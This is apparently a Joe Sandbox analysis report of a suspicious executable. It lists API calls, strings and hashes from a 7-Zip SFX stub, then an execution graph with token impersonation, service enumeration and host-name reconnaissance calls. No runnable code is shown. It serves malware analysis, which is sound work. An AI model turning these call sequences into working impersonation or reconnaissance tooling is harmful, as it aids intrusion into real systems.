                                                                            • Opcode Fuzzy Hash: a1c705515403c0a0f0d3fe43341ef8c84b8a99b42ffc9b0f279362683b036e50
                                                                            • Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$lstrlen
                                                                            • String ID:
                                                                            • API String ID: 2031685711-0
                                                                            • Opcode ID: a45d510ae1538bb769c480bb42da49c1a16301055923b34945e590d69a25caba
                                                                            • Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
                                                                            • Opcode Fuzzy Hash: a45d510ae1538bb769c480bb42da49c1a16301055923b34945e590d69a25caba
                                                                            • Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648
                                                                            APIs
                                                                              • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
                                                                              • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C
                                                                            • GetSystemMetrics.USER32(00000007), ref: 004080B4
                                                                            • GetSystemMetrics.USER32(00000007), ref: 004080C5
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$??3@
                                                                            • String ID: 100%%
                                                                            • API String ID: 2562992111-568723177
                                                                            • Opcode ID: f97ada8ea1c28143f02298183820e063e18118760441c1241ef7ee3e932a0dae
                                                                            • Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
                                                                            • Opcode Fuzzy Hash: f97ada8ea1c28143f02298183820e063e18118760441c1241ef7ee3e932a0dae
                                                                            • Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9
                                                                            APIs
                                                                              • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
                                                                              • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7
                                                                            • wsprintfW.USER32 ref: 00404F19
                                                                            • ??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$??3@wsprintf
                                                                            • String ID: %X - %03X - %03X - %03X - %03X$xcA
                                                                            • API String ID: 1174869416-1550840741
APIs
• lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
• lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
• _wcsnicmp.MSVCRT ref: 0040423D
Strings
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: lstrlen$_wcsnicmp
• String ID: Mg@
• API String ID: 2823567412-3680729969
APIs
• LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
• GetProcAddress.KERNEL32(00000000), ref: 004023CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32
• API String ID: 2574300362-3900151262
APIs
• LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
• GetProcAddress.KERNEL32(00000000), ref: 00402401
Strings
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32
• API String ID: 2574300362-736604160
APIs
• _CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
• ??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
• memcpy.MSVCRT(00000000,0061A348,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
• ??3@YAXPAX@Z.MSVCRT(0061A348,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: ??2@??3@ExceptionThrowmemcpy
• String ID:
• API String ID: 3462485524-0
APIs
  • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
  • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
  • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
• SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
• GetDlgItem.USER32(?,000004B7), ref: 00408A97
• SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5
  • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
  • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
  • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
  • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
  • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
  • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
  • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
  • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
  • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
  • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
  • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
  • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
  • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
  • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
  • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
  • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
  • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
  • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
• String ID:
• API String ID: 3043669009-0
APIs
• SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
• GetSystemMetrics.USER32(00000031), ref: 004070E8
• CreateFontIndirectW.GDI32(?), ref: 004070F7
• DeleteObject.GDI32(00000000), ref: 00407126
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
• String ID:
• API String ID: 1900162674-0
APIs
• ScreenToClient.USER32(?,?), ref: 004085B0
• GetClientRect.USER32(?,?), ref: 004085C2
• PtInRect.USER32(?,?,?), ref: 004085D1
  • Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6
• CallNextHookEx.USER32(?,?,?), ref: 004085F3
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: ClientRect$CallHookKillNextScreenTimer
• String ID:
• API String ID: 3015594791-0
APIs
  • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
  • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
• SetWindowTextW.USER32(?,?), ref: 0040417D
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00404188
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: ??3@TextWindow$Length
• String ID:
• API String ID: 2308334395-0
APIs
• GetObjectW.GDI32(?,0000005C,?), ref: 00407931
• CreateFontIndirectW.GDI32(?), ref: 00407947
• GetDlgItem.USER32(?,000004B5), ref: 0040795B
• SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: CreateFontIndirectItemMessageObjectSend
• String ID:
• API String ID: 2001801573-0

APIs
• GetParent.USER32(?), ref: 00401D92
• GetWindowRect.USER32(?,?), ref: 00401DAB
• ScreenToClient.USER32(00000000,?), ref: 00401DB9
• ScreenToClient.USER32(00000000,?), ref: 00401DC0
Similarity
• API ID: ClientScreen$ParentRectWindow
• String ID:
• API String ID: 2099118873-0

APIs
• ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C
Strings
Similarity
• API ID: ??3@
• String ID: (nA${D@
• API String ID: 613200358-2741945119

APIs
  • Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574
• ??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36
  • Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
  • Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
  • Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E
Strings
Similarity
• API ID: ??2@$??3@$memmove
• String ID: {D@
• API String ID: 4294387087-1160549682

APIs
Strings
Similarity
• API ID: _wtol
• String ID: GUIFlags$^L@
• API String ID: 2131799477-2609156739

APIs
Strings
Similarity
• API ID: ??3@wsprintf
• String ID: (%d%s)
• API String ID: 3815514257-2087557067

APIs
• GetWindowTextLengthW.USER32(?), ref: 004030FB
• GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
Strings
Similarity
• API ID: TextWindow$Length
• String ID: t1@
• API String ID: 1006428111-473456572

APIs
• MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472
Strings
Similarity
• API ID: Message
• String ID: 7-Zip SFX$Could not allocate memory
• API String ID: 2030045667-3806377612

Execution Graph

Execution Coverage: 3.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 10.3%
Total number of Nodes: 1054
Total number of Limit Nodes: 37
7ff6c2bac3d7 22761 7ff6c2b83730 _RunAllParam 89 API calls 22760->22761 22762 7ff6c2bac3f1 22761->22762 22763 7ff6c2bac4a1 22762->22763 22794 7ff6c2be9bc0 LoadLibraryA 22762->22794 22764 7ff6c2bac4a3 LeaveCriticalSection 22763->22764 22764->22744 22767 7ff6c2bac480 22767->22764 22772 7ff6c2bac491 timeGetTime 22767->22772 22768 7ff6c2bac413 OpenProcess OpenProcessToken 22769 7ff6c2bac446 ImpersonateLoggedOnUser 22768->22769 22770 7ff6c2bac43d 22768->22770 22769->22770 22771 7ff6c2bac46c CloseHandle CloseHandle 22769->22771 22773 7ff6c2b83730 _RunAllParam 89 API calls 22770->22773 22771->22767 22772->22764 22774 7ff6c2bac46a 22773->22774 22774->22771 22775->22713 22776->22713 22778->22713 22779->22673 22780->22713 22781->22713 22782->22675 22783->22713 22784->22713 22785->22690 22787->22715 22789->22730 22790->22754 22817 7ff6c2be9ef0 22791->22817 22793 7ff6c2bea0d2 22793->22760 22795 7ff6c2be9c11 GetProcAddress GetProcAddress 22794->22795 22796 7ff6c2be9c46 22794->22796 22795->22796 22798 7ff6c2be9c40 22795->22798 22797 7ff6c2be9c49 GetSystemMetrics 22796->22797 22799 7ff6c2be9c80 CreateToolhelp32Snapshot 22797->22799 22800 7ff6c2be9c58 22797->22800 22798->22797 22802 7ff6c2be9c94 Process32First 22799->22802 22803 7ff6c2be9cb7 22799->22803 22800->22799 22801 7ff6c2be9c61 GetCurrentProcessId ProcessIdToSessionId 22800->22801 22801->22799 22804 7ff6c2be9cae CloseHandle 22802->22804 22809 7ff6c2be9cd0 22802->22809 22805 7ff6c2be9cbc FreeLibrary 22803->22805 22806 7ff6c2be9cc5 22803->22806 22804->22803 22805->22806 22808 7ff6c2c37220 _getdrive 8 API calls 22806->22808 22810 7ff6c2bac40f 22808->22810 22811 7ff6c2be9d5a Process32Next 22809->22811 22812 7ff6c2be9d0b CloseHandle 22809->22812 22813 7ff6c2be9cf6 ProcessIdToSessionId 22809->22813 22858 7ff6c2c39700 22809->22858 22810->22767 22810->22768 22811->22809 22811->22812 22815 7ff6c2be9d1d FreeLibrary 22812->22815 22816 7ff6c2be9d26 22812->22816 22813->22809 22813->22811 22815->22816 22816->22806 22818 7ff6c2be9f28 
22817->22818 22832 7ff6c2be9fdc 22817->22832 22820 7ff6c2be9f30 GetProcessWindowStation 22818->22820 22818->22832 22819 7ff6c2be9fec 22846 7ff6c2be9d80 22819->22846 22822 7ff6c2be9f47 GetUserObjectInformationA GetLastError SetLastError 22820->22822 22823 7ff6c2be9f3b 22820->22823 22826 7ff6c2be9fae 22822->22826 22827 7ff6c2be9f79 RevertToSelf 22822->22827 22824 7ff6c2b83730 _RunAllParam 89 API calls 22823->22824 22828 7ff6c2bea0a9 22824->22828 22826->22832 22833 7ff6c2be9fb7 22826->22833 22831 7ff6c2b83730 _RunAllParam 89 API calls 22827->22831 22828->22793 22829 7ff6c2bea000 GetUserNameA 22830 7ff6c2bea06f 22829->22830 22834 7ff6c2bea012 GetLastError 22829->22834 22836 7ff6c2b83730 _RunAllParam 89 API calls 22830->22836 22835 7ff6c2be9fa1 22831->22835 22832->22819 22832->22823 22837 7ff6c2b83730 _RunAllParam 89 API calls 22833->22837 22838 7ff6c2bea044 GetLastError 22834->22838 22839 7ff6c2bea01f 22834->22839 22835->22793 22840 7ff6c2bea087 22836->22840 22841 7ff6c2be9fcc 22837->22841 22843 7ff6c2b83730 _RunAllParam 89 API calls 22838->22843 22842 7ff6c2b83730 _RunAllParam 89 API calls 22839->22842 22840->22793 22841->22793 22844 7ff6c2bea034 22842->22844 22845 7ff6c2bea062 22843->22845 22844->22793 22845->22793 22847 7ff6c2be9bc0 84 API calls 22846->22847 22848 7ff6c2be9da3 22847->22848 22849 7ff6c2be9dae OpenProcess OpenProcessToken 22848->22849 22857 7ff6c2be9da7 22848->22857 22850 7ff6c2be9de0 22849->22850 22851 7ff6c2be9de7 GetTokenInformation 22849->22851 22853 7ff6c2be9eb7 CloseHandle 22850->22853 22854 7ff6c2be9ea9 CloseHandle 22851->22854 22855 7ff6c2be9e16 LookupAccountSidA CloseHandle CloseHandle 22851->22855 22852 7ff6c2c37220 _getdrive 8 API calls 22856 7ff6c2be9eda 22852->22856 22853->22857 22854->22853 22855->22857 22856->22829 22856->22830 22857->22852 22859 7ff6c2c3970d 22858->22859 22860 7ff6c2c39731 22858->22860 22859->22860 22861 7ff6c2c3ffc8 _errno 70 API calls 22859->22861 22862 7ff6c2c39717 22861->22862 22863 7ff6c2c449d4 
_invalid_parameter_noinfo 17 API calls 22862->22863 22864 7ff6c2c39722 22863->22864 22864->22809 23310 7ff6c2b8ab70 95 API calls _RunAllParam 23311 7ff6c2b90b70 89 API calls 23312 7ff6c2b94970 97 API calls 2 library calls 23315 7ff6c2b83770 111 API calls 2 library calls 23316 7ff6c2bb5100 82 API calls 2 library calls 23317 7ff6c2bb0700 9 API calls 22224 7ff6c2b89d00 22245 7ff6c2b829a0 22224->22245 22226 7ff6c2b89db3 OpenSCManagerA 22227 7ff6c2b89de0 EnumServicesStatusA 22226->22227 22228 7ff6c2b89dc9 22226->22228 22229 7ff6c2b89e2b GetLastError 22227->22229 22230 7ff6c2b89fed CloseServiceHandle 22227->22230 22233 7ff6c2c37220 _getdrive 8 API calls 22228->22233 22229->22230 22232 7ff6c2b89e3c 22229->22232 22230->22228 22231 7ff6c2b89d6b 22231->22226 22232->22230 22235 7ff6c2b89e54 EnumServicesStatusA 22232->22235 22234 7ff6c2b8a017 22233->22234 22236 7ff6c2b89e93 22235->22236 22237 7ff6c2b89fe1 _RunAllParam 22235->22237 22236->22237 22238 7ff6c2b89eac OpenServiceA 22236->22238 22237->22230 22238->22237 22239 7ff6c2b89ecb QueryServiceConfigA 22238->22239 22240 7ff6c2b89ee5 GetLastError 22239->22240 22241 7ff6c2b89fc7 CloseServiceHandle 22239->22241 22240->22241 22244 7ff6c2b89ef4 _RunAllParam 22240->22244 22241->22236 22241->22237 22242 7ff6c2b89f08 QueryServiceConfigA 22242->22244 22243 7ff6c2b829a0 81 API calls 22243->22244 22244->22241 22244->22242 22244->22243 22246 7ff6c2b82a17 22245->22246 22249 7ff6c2b829bd 22245->22249 22247 7ff6c2b82a29 22246->22247 22264 7ff6c2c370b4 71 API calls std::exception::exception 22246->22264 22251 7ff6c2b82a42 22247->22251 22265 7ff6c2b83050 81 API calls std::exception::exception 22247->22265 22249->22246 22252 7ff6c2b829e6 22249->22252 22251->22231 22253 7ff6c2b82d12 22252->22253 22266 7ff6c2c37110 71 API calls std::exception::exception 22252->22266 22255 7ff6c2b82d22 22253->22255 22256 7ff6c2b82d41 22253->22256 22267 7ff6c2b82fb0 71 API calls 22255->22267 22258 7ff6c2b82d53 22256->22258 22269 7ff6c2c370b4 71 API calls 
std::exception::exception 22256->22269 22263 7ff6c2b82d3c 22258->22263 22270 7ff6c2b83050 81 API calls std::exception::exception 22258->22270 22259 7ff6c2b82d2f 22268 7ff6c2b82fb0 71 API calls 22259->22268 22263->22231 22264->22247 22265->22251 22266->22253 22267->22259 22268->22263 22269->22258 22270->22263 23318 7ff6c2b92d00 24 API calls 23319 7ff6c2b8f700 280 API calls 2 library calls 23321 7ff6c2bb34f7 10 API calls _getdrive 23322 7ff6c2baab10 96 API calls 2 library calls 23323 7ff6c2b90310 73 API calls free 23324 7ff6c2b93110 73 API calls 2 library calls 23325 7ff6c2b89910 11 API calls _getdrive 23326 7ff6c2b8a910 99 API calls _RunAllParam 23327 7ff6c2ba4003 239 API calls 2 library calls 23328 7ff6c2b85910 13 API calls _getdrive 23334 7ff6c2bb3523 92 API calls 2 library calls 23335 7ff6c2ba4003 265 API calls 2 library calls 23337 7ff6c2b8ff30 11 API calls _getdrive 23338 7ff6c2ba3530 120 API calls 2 library calls 23339 7ff6c2b9a130 173 API calls 4 library calls 23342 7ff6c2ba92c0 119 API calls _RunAllParam 23343 7ff6c2baf8c0 72 API calls _getdrive 23344 7ff6c2b97ac0 10 API calls _RunAllParam 23346 7ff6c2ba22c0 114 API calls 5 library calls 23351 7ff6c2ba8ed0 127 API calls _getdrive 23352 7ff6c2b900d0 88 API calls 2 library calls 22431 7ff6c2ba36d0 SetErrorMode 22432 7ff6c2ba3734 22431->22432 22433 7ff6c2b83730 _RunAllParam 89 API calls 22432->22433 22434 7ff6c2ba3764 GetCurrentThreadId GetThreadDesktop 22433->22434 22435 7ff6c2ba3799 22434->22435 22557 7ff6c2ba33a0 22435->22557 22436 7ff6c2ba37b4 22472 7ff6c2ba39df 22436->22472 22569 7ff6c2b9f940 22436->22569 22438 7ff6c2ba39ea 22439 7ff6c2b83730 _RunAllParam 89 API calls 22438->22439 22446 7ff6c2ba3a11 22439->22446 22440 7ff6c2c37220 _getdrive 8 API calls 22442 7ff6c2ba7ff0 22440->22442 22441 7ff6c2ba37ce 22585 7ff6c2c3851c 22441->22585 22444 7ff6c2ba3825 22445 7ff6c2c392a4 __wtomb_environ 70 API calls 22444->22445 22447 7ff6c2ba3838 22445->22447 22450 7ff6c2ba7ef3 22446->22450 22606 7ff6c2bed170 22446->22606 
22448 7ff6c2c392a4 __wtomb_environ 70 API calls 22447->22448 22449 7ff6c2ba3842 22448->22449 22591 7ff6c2bea320 22449->22591 22453 7ff6c2b83730 _RunAllParam 89 API calls 22450->22453 22450->22472 22465 7ff6c2ba7f3e 22453->22465 22455 7ff6c2ba3a76 22457 7ff6c2b83730 _RunAllParam 89 API calls 22455->22457 22456 7ff6c2ba3867 22459 7ff6c2c38bf4 free 70 API calls 22456->22459 22461 7ff6c2ba3874 22456->22461 22460 7ff6c2ba3a8e timeGetTime 22457->22460 22458 7ff6c2c38bf4 free 70 API calls 22458->22456 22459->22461 22462 7ff6c2ba3aaf 22460->22462 22463 7ff6c2ba3905 22461->22463 22467 7ff6c2ba38d0 SleepEx 22461->22467 22461->22472 22610 7ff6c2be5f30 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 22462->22610 22469 7ff6c2b83730 _RunAllParam 89 API calls 22463->22469 22617 7ff6c2beab00 95 API calls _RunAllParam 22465->22617 22466 7ff6c2ba3abc 22468 7ff6c2ba3ac0 EnterCriticalSection 22466->22468 22473 7ff6c2ba3b17 _recalloc 22466->22473 22467->22461 22467->22472 22474 7ff6c2ba3af7 22468->22474 22481 7ff6c2ba3947 22469->22481 22472->22440 22475 7ff6c2ba3bd1 GetComputerNameA 22473->22475 22611 7ff6c2b9aed0 89 API calls _recalloc 22474->22611 22477 7ff6c2ba3c52 22475->22477 22483 7ff6c2ba3bec 22475->22483 22479 7ff6c2ba3c83 gethostname 22477->22479 22487 7ff6c2ba3c57 22477->22487 22478 7ff6c2ba3b0d LeaveCriticalSection 22478->22473 22482 7ff6c2ba3caf 22479->22482 22479->22487 22596 7ff6c2bea290 22481->22596 22613 7ff6c2ba3220 71 API calls 2 library calls 22482->22613 22612 